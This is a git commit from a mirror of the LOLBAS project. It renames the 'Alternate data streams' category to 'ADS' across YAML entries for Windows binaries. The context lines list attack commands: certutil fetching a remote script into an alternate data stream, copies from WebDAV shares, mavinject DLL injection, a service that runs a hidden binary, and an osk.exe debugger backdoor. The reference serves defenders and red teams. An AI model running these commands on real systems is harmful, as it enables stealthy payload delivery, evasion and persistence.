mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Changed alternate data stream to ADS as category
This commit is contained in:
parent
7961a99173
commit
d48273583e
@ -3,7 +3,10 @@
|
||||
#Author: Oddvar Moe
|
||||
#If you can use it, be my guest!
|
||||
|
||||
$mainpath = "C:\data\gitprojects\LOLBAS"
|
||||
# Install-Module powershell-yaml
|
||||
# import-module powershell-yaml
|
||||
|
||||
$mainpath = "C:\LOLBAS"
|
||||
|
||||
|
||||
function Convert-YamlToMD
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
|
||||
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1196
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: cscript c:\ads\file.txt:script.vbs
|
||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
||||
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
|
||||
Usecase: Extract hidden file within alternate data streams
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -31,7 +31,7 @@ Commands:
|
||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -23,7 +23,7 @@ Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
||||
Description: Copies source file to destination Alternate Data Stream (ADS)
|
||||
Usecase: Copies files from A to B
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
||||
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
|
||||
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
|
||||
Usecase: Inject dll file into running process
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -31,7 +31,7 @@ Commands:
|
||||
- Command: mshta.exe "C:\ads\file.txt:file.hta"
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
Usecase: Execute code hidden in alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1170
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||
Usecase: Hide/plant registry information in Alternate data stream for later use
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Description: Export the target Registry key to the specified .REG file.
|
||||
Usecase: Hide registry data in alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: regedit C:\ads\file.txt:regfile.reg"
|
||||
Description: Import the target .REG file into the Registry.
|
||||
Usecase: Import hidden registry data from alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||
Description: Creates a new service and executes the file stored in the ADS.
|
||||
Usecase: Execute binary file hidden inside an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -20,7 +20,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
|
||||
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
||||
Category: Execute
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: wscript c:\ads\file.txt:script.vbs
|
||||
Description: Execute script stored in an alternate data stream
|
||||
Usecase: Execute hidden code to evade defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
|
Loading…
Reference in New Issue
Block a user